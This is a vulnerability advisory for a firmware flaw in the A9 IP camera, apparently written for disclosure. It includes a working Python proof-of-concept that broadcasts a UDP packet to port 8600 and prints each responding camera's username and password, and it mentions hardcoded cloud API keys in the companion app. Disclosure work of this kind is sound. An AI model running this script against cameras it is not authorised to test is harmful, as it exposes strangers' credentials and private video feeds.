Summary

An issue in CYCZCAM, SHIX ZHAO, SHIXCAM A9 Camera (circuit board identifier A9-48B-V1.0) firmware v.CYCAM_48B_BC01_v87_0903 allows a remote attacker to obtain sensitive information via a crafted request to a UDP port.

Vulnerability Details

By sending a packet with data 0x2211 to the camera via UDP port 8600, an attacker can acquire the password to add the camera and access the camera’s video feed. To find out whether your “A9” camera is vulnerable, you can check

  1. by running the PoC script on your LAN, all affected cameras will reply to you Script Output
  2. the internals of the camera A9 Camera Circuit Board
  3. the serial number(DDD-XXXXXX-XXXXX) when adding the camera in CY365/365cam, Adding the camera via developer’s app
  4. the firmware version(CYCAM_48B_BC01_v87_0903) after you have added the camera, camera firmware

Proof-of-Concept

#!/usr/bin/env python3

import os, logging, socket, re
from netifaces import interfaces, ifaddresses, AF_INET

# alternatively if you know the camera's IP address
# you can replace it here
TARGET = '255.255.255.255'

ips = []
ifaces = interfaces()
for iface in ifaces:
  addrs = ifaddresses(iface)
  if AF_INET in addrs: addrs = addrs[AF_INET]
  else: continue

  for addr in addrs:
    ip = addr['addr']
    if ip in ips or ip == '0.0.0.0' or ip[0:3] == '127' or ip[0:7] == '169.254': continue
    ips.append(ip)

for ip in ips:
  s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
  s.setsockopt(socket.SOL_SOCKET, socket.SO_BROADCAST, 1)
  s.settimeout(.5)
  s.bind((ip, 0))

  lanSearch = b'\x22\x11'
  s.sendto(lanSearch, (TARGET, 8600))
  while True:
      try:
        (buff, rinfo) = s.recvfrom(1024)
        #print('Data from %s: %s' % (rinfo, buff))
        print('IP: ' + buff[4:20].decode('ascii').rstrip('\0'))
        print('Device ID: ' + buff[92:110].decode('ascii').rstrip('\0'))
        print('Username: ' + buff[188:193].decode('ascii').rstrip('\0'))
        print('Password: ' + buff[193:].decode('ascii').rstrip('\0'))

      except socket.timeout as e:
        break

Misc.

Multiple communication attempts to multiple email addresses possibly linked to the “vendor” were made in early 2024, with zero response.

Users of the Android app’s “cloud storage service” should also reevaluate its risks as the API keys hardcoded into the application can be easily accessed by anyone.